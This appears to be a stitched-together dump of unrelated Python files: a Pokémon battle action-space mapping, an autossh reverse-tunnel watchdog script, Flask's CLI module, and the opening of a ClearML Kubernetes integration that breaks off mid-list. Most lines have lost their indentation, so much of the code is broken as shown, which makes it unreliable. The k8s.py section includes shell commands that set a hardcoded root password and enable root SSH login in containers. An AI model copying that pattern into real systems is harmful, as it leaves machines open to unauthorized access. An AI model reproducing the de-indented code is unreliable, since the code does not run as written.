battle.active_pokemon.available_z_moves[action - 4], z_move=True
)
elif (
battle.can_mega_evolve
and 0 <= action - 8 < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action - 8], mega=True)
elif (
battle.can_dynamax
and 0 <= action - 12 < len(battle.available_moves)
and not battle.force_switch
):
return self.create_order(battle.available_moves[action - 12], dynamax=True)
elif 0 <= action - 16 < len(battle.available_switches):
return self.create_order(battle.available_switches[action - 16])
else:
return self.choose_random_move(battle)
@property
def action_space(self) -> List:
"""The action space for gen 8 single battles.
The conversion to moves is done as follows:
0 <= action < 4:
The actionth available move in battle.available_moves is executed.
4 <= action < 8:
The action - 4th available move in battle.available_moves is executed,
with z-move.
8 <= action < 12:
The action - 8th available move in battle.available_moves is executed,
with mega-evolution.
12 <= action < 16:
The action - 12th available move in battle.available_moves is executed,
while dynamaxing.
16 <= action < 22
The action - 16th available switch in battle.available_switches is
executed.
"""
return self._ACTION_SPACE
def gen8_legal_action_mask(self, battle: Battle, switches_on=True) -> List:
legal_actions = [0] * 22
if not battle.force_switch:
for i in range(0, len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_z_move:
for i in range(4, 4+len(battle.active_pokemon.available_z_moves)):
legal_actions[i] = 1
if battle.can_mega_evolve:
for i in range(8, 8 + len(battle.available_moves)):
legal_actions[i] = 1
if battle.can_dynamax:
for i in range(12, 12 + len(battle.available_moves)):
legal_actions[i] = 1
if switches_on or sum(legal_actions) == 0:
for i in range(16, 16 + len(battle.available_switches)):
legal_actions[i] += 1
return legal_actions
|
autossh.py
|
#!/usr/bin/env python3
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
import os
import time
import sys
import threading
from subprocess import Popen, PIPE, STDOUT
import traceback
import json
import argparse
import re
import datetime
# parse args
parser = argparse.ArgumentParser()
parser.add_argument('--config', default=sys.argv[0] + '.conf', help='config file location')
parser.add_argument('--ssh-user', help='ssh user for ssh connection')
parser.add_argument('--ssh-host', help='remote host for ssh connection')
parser.add_argument('--ssh-options', help='additional options for ssh, for example "-tt -o AddressFamily=inet -o ExitOnForwardFailure=yes"')
parser.add_argument('--ssh-forwards', help='forward options for ssh, for example "-R 2001:127.0.0.1:22"')
parser.add_argument('--ssh-key', help='private key for ssh connection, for example "/home/mu_user/.ssh/id_rsa_pf"')
parser.add_argument('--pid-file', help='pid file location')
parser.add_argument('--log-file', help='log file location')
parser.add_argument('--log-level', help='set output level for log messages')
parser.add_argument('--connection-tester-interval', type=int, help='interval for watchdog message check, will break connection if control message not received')
parser.add_argument('--disable-connection-tester', type=bool, help='disable connection testing via remote script if --disable-connection-tester="if_not_empty_string"')
parser.add_argument('--daemon', type=bool, help='enable daemon mode if --daemon="if_not_empty_string"')
args = parser.parse_args()
# init config dictionary
conf = dict()
# get config from json file
with open(args.config) as config_fh:
    conf_file = json.load(config_fh)
# add parsed from config_file to config dictionary
for key in conf_file:
conf[key] = conf_file[key]
# add parsed args to config dictionary (argparse stores '--ssh-user' as
# 'ssh_user', while the config file and the rest of this script use dashed keys)
for key, value in vars(args).items():
    if value:
        conf[key.replace('_', '-')] = value
# ensure the interval is an int (config file values may arrive as strings)
conf['connection-tester-interval'] = int(conf['connection-tester-interval'])
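# Example config file (illustrative values; keys mirror the CLI options above):
#
#     {
#         "ssh-user": "tunnel",
#         "ssh-host": "example.com",
#         "ssh-options": "-tt -o AddressFamily=inet -o ExitOnForwardFailure=yes",
#         "ssh-forwards": "-R 2001:127.0.0.1:22",
#         "ssh-key": "/home/mu_user/.ssh/id_rsa_pf",
#         "pid-file": "/run/autossh.pid",
#         "log-file": "/var/log/autossh.log",
#         "log-level": "info",
#         "connection-tester-interval": 30,
#         "disable-connection-tester": "",
#         "daemon": ""
#     }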
# fork if daemon mode
if conf['daemon']:
if os.fork():
sys.exit()
# write pid file
with open(conf['pid-file'], 'w') as pid:
pid.write(str(os.getpid()))
# open log file
log_file = open(conf['log-file'], 'w')
def do_log(message, level):
'''
Write log messages to the log file or stdout, depending on the configured
log level. Setting log-level to 'output' prints to stdout instead.
Valid file log levels: 'debug', 'info', 'none'.
'''
if conf['log-level'] == 'output':
print(str(datetime.datetime.now()) + ' ' + str(message).strip())
return
if level == conf['log-level']:
log_file.write(str(datetime.datetime.now()) + ' ' + str(message).strip() + '\n')
log_file.flush()
def receive_stdout_message():
'''
Thread for receiving stdout messages from the subprocess.
Validates each message value and adds it to the control set,
which is checked by the watchdog.
'''
while data['alive']:
if data.get('stdout'):
message = data['stdout'].readline().decode('UTF-8')[:1]
if not message:
do_log('null stdout: ' + message, 'debug')
time.sleep(1)
# message validation: skip our own echoed '1'; anything other than '2' is invalid
if message == '1':
continue
if message != '2':
data['alive'] = False
do_log('Stdout message is not valid, stdout: ' + str(message), 'debug')
continue
data['message'].add(message)
do_log('stdout: ' + message, 'debug')
else:
time.sleep(1)
def receive_stderr_message():
'''Thread for receiving stderr messages from the subprocess'''
while data['alive']:
if data.get('stderr'):
message = data['stderr'].readline().decode('UTF-8')
if not message:
time.sleep(1)
continue
do_log('stderr: ' + str(message), 'debug')
else:
time.sleep(1)
def watchdog():
'''Watchdog that checks for new messages from the stdout thread; if no new message arrived, it signals all threads to stop'''
while data['alive']:
if data.get('stdout'):
try:
time.sleep(conf['connection-tester-interval'])
# pop a control message received during the interval; an empty set
# raises KeyError, which signals that the connection test failed
message = data['message'].pop()
except KeyError:
data['alive'] = False
do_log('No stdout, exit', 'debug')
else:
time.sleep(1)
# Add 'AddressFamily inet' to the ssh config: otherwise ssh may fall back to
# IPv6-only forwarding when IPv4 fails, which breaks the tunnel
def ssh():
'''
SSH to the destination host and monitor the thread count.
If the thread count is wrong, stop all threads and start from scratch.
Write control messages to the destination host.
'''
template = 'ssh {0} -i {1} {2} {3}@{4}'
command = template.format(conf['ssh-options'],
conf['ssh-key'],
conf['ssh-forwards'],
conf['ssh-user'],
conf['ssh-host']).split()
proc = Popen(command, stdin=PIPE, stdout=PIPE, stderr=PIPE)
# create data exchange points
# stdout exchange point for stdout thread
data['stdout'] = proc.stdout
# stderr exchange point for stderr thread
data['stderr'] = proc.stderr
# exchange point for stdout and watchdog threads
data['message'] = set()
# write control messages to stdin and signal all threads to stop if any thread is dead
stdin_line = '1\n'
while data['alive']:
# if connection check is disabled then skip threading checks and stdin messages write
if conf['disable-connection-tester']:
message = data['stderr'].readline().decode('UTF-8')
if not message:
break
do_log('stderr: ' + str(message), 'debug')
continue
else:
proc.stdin.write(stdin_line.encode('UTF-8'))
proc.stdin.flush()
time.sleep(2)
# signal stop if not all threads are running
if threading.active_count() != 4:
data['alive'] = False
do_log('Some thread is dead', 'debug')
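# The connection tester assumes the remote login shell runs a small
# responder that answers each control '1' with a '2' (hypothetical sketch,
# not part of this script):
#
#     while read line; do echo 2; done
#
# Any other reply is treated as invalid by receive_stdout_message().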
# main loop, which always run fresh start after all threads exit
while True:
try:
# if connection check is disabled then do not start other threads
if not conf['disable-connection-tester']:
# loop which waits for all threads to exit before a fresh start
while threading.active_count() != 1:
do_log('Waiting for all threads stop Threads count: ' + str(threading.active_count()), 'debug')
data['alive'] = False
time.sleep(1)
# fresh start begin
data = dict()
data['alive'] = True
thread_stdout = threading.Thread(target=receive_stdout_message)
thread_stdout.daemon = True
thread_stdout.start()
thread_stderr = threading.Thread(target=receive_stderr_message)
thread_stderr.daemon = True
thread_stderr.start()
thread_watchdog = threading.Thread(target=watchdog)
thread_watchdog.daemon = True
thread_watchdog.start()
else:
data = dict()
data['alive'] = True
do_log('New iteration Threads count: ' + str(threading.active_count()), 'debug')
do_log('Connection started', 'info')
ssh()
# stop if Ctrl + C
except KeyboardInterrupt:
sys.exit(0)
# write all exceptions to log and keep going
except Exception:
trace = traceback.format_exception(*sys.exc_info())
do_log(str(trace), 'info')
time.sleep(1)
|
cli.py
|
import ast
import inspect
import os
import platform
import re
import sys
import traceback
import warnings
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
f" to specify the correct one."
)
# Search for app factory functions.
for attr_name in {"create_app", "make_app"}:
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory {attr_name!r} in module {module.__name__!r},"
" but could not call it without arguments. Use"
f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
" to specify arguments."
)
raise NoAppException(
"Failed to find Flask application or factory in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
" to specify one."
)
def call_factory(script_info, app_factory, args=None, kwargs=None):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
sig = inspect.signature(app_factory)
args = [] if args is None else args
kwargs = {} if kwargs is None else kwargs
if "script_info" in sig.parameters:
warnings.warn(
"The 'script_info' argument is deprecated and will not be"
" passed to the app factory function in 2.1.",
DeprecationWarning,
)
kwargs["script_info"] = script_info
if (
not args
and len(sig.parameters) == 1
and next(iter(sig.parameters.values())).default is inspect.Parameter.empty
):
warnings.warn(
"Script info is deprecated and will not be passed as the"
" single argument to the app factory function in 2.1.",
DeprecationWarning,
)
args.append(script_info)
return app_factory(*args, **kwargs)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(script_info, module, app_name):
"""Check if the given string is a variable name or a function. Call
a function to get the app instance, or return the variable directly.
"""
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
if isinstance(expr, ast.Name):
name = expr.id
args = kwargs = None
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
)
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
)
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = call_factory(script_info, attr, args, kwargs)
except TypeError:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next:
raise NoAppException(
f"While importing {module_name!r}, an ImportError was"
f" raised:\n\n{traceback.format_exc()}"
)
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.")
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {__version__}\n"
f"Werkzeug {werkzeug.__version__}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp:
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=None):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading is None:
use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
raise exc_info[1].with_traceback(exc_info[2])
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo:
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app being
returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(self, import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
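# Typical usage (sketch; `my_command` is a hypothetical command):
#
#     @click.command()
#     @with_appcontext
#     def my_command():
#         ...  # current_app is available here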
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this. See :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra,
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
return info.load_app().cli.get_command(ctx, name)
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
def list_commands(self, ctx):
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super().main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path)
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = f" * Serving Flask app {app_import_path!r}"
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(f" * Environment: {env}")
if env == "production":
click.secho(
" WARNING: This is a development server. Do not use it in"
" a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
)
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
is_context = ssl and isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:`` on POSIX, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loading",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command():
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {app.import_name} [{app.env}]\n"
f"Instance: {app.instance_path}"
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
# TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
cli.main(args=sys.argv[1:], prog_name="python -m flask" if as_module else None)
if __name__ == "__main__":
main(as_module=True)
|
k8s.py
|
from __future__ import print_function, division, unicode_literals
import base64
import functools
import json
import logging
import os
import re
import subprocess
import tempfile
from copy import deepcopy
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Text, List, Callable, Any, Collection, Optional, Union
import yaml
from clearml_agent.commands.events import Events
from clearml_agent.commands.worker import Worker, get_task_container
from clearml_agent.definitions import ENV_DOCKER_IMAGE
from clearml_agent.errors import APIError
from clearml_agent.helper.base import safe_remove_file
from clearml_agent.helper.dicts import merge_dicts
from clearml_agent.helper.process import get_bash_output
from clearml_agent.helper.resource_monitor import ResourceMonitor
from clearml_agent.interface.base import ObjectID
class K8sIntegration(Worker):
K8S_PENDING_QUEUE = "k8s_scheduler"
K8S_DEFAULT_NAMESPACE = "clearml"
AGENT_LABEL = "CLEARML=agent"
LIMIT_POD_LABEL = "ai.allegro.agent.serial=pod-{pod_number}"
KUBECTL_APPLY_CMD = "kubectl apply --namespace={namespace} -f"
KUBECTL_RUN_CMD = "kubectl run clearml-id-{task_id} " \
"--image {docker_image} {docker_args} " \
"--restart=Never " \
"--namespace={namespace}"
KUBECTL_DELETE_CMD = "kubectl delete pods " \
"--selector={selector} " \
"--field-selector=status.phase!=Pending,status.phase!=Running " \
"--namespace={namespace}"
BASH_INSTALL_SSH_CMD = [
"apt-get update",
"apt-get install -y openssh-server",
"mkdir -p /var/run/sshd",
"echo 'root:training' | chpasswd",
"echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config",
"sed -i 's/PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config",
